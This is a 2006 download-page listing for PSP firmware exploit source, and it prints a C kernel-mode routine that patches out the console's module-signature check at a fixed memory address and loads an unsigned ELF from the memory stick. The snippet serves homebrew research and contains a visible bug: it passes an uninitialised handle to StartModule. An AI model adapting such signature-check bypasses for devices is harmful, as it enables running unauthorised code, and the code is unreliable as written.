2.60 Firmware Exploit - Fanjita Source
Filename: SAVEDATA.rar
Date Posted: Jun 27, 2006
Categories: Source Code, PSP
Tags: PSP
Downloads: 1112
Description:
Fanjita has released the "source" of his work so far today on this newly discovered exploit. If you would like to take a look at it and continue investigating, have a look!
Only for v2.5 / v2.6.
Based on Proof of Concept code by Hitchhikr / Neural.
Function: Attempts to load ms0:/kernel.elf using sceLoadModule/sceStartModule when in kernel mode, after writing a NOP to 0x8801A5B4.
Diags: Writes a log of operations to ms0:/GTALOG.TXT.
If LoadModule fails, writes the error code to ms0:/failload.trc.
If StartModule fails, writes the error code to ms0:/failstart.trc.
Source for the interesting bit:
    void kernel_proc(void) {
        // Dump'em all - read access
        int handle;
        int luid;
        unsigned int *probe;

        dlog("check dlog");
    #if 1
        dlog("patch module check");
        // Patch module check
        probe = (unsigned int*) 0x8801A5B4;
        probe[0] = 0;
    #endif
        dlog("load module");
        // try loading an ELF
        luid = sceKernelLoadModule("ms0:/kernel.elf", 0, NULL);
        if (luid < 0)
        {
            handle = sceIoOpen("ms0:/failload.trc", O_WRONLY | O_CREAT | O_TRUNC, 0777);
            sceIoWrite(handle, &luid, 4);
            sceIoClose(handle);
        }
        else
        {
            dlog("start module");
            luid = sceKernelStartModule(handle, 0, NULL, NULL, NULL);
            if (luid < 0)
            {
                handle = sceIoOpen("ms0:/failstart.trc", O_WRONLY | O_CREAT | O_TRUNC, 0777);
                sceIoWrite(handle, &luid, 4);
                sceIoClose(handle);
            }
        }
        for(;;) { }
    }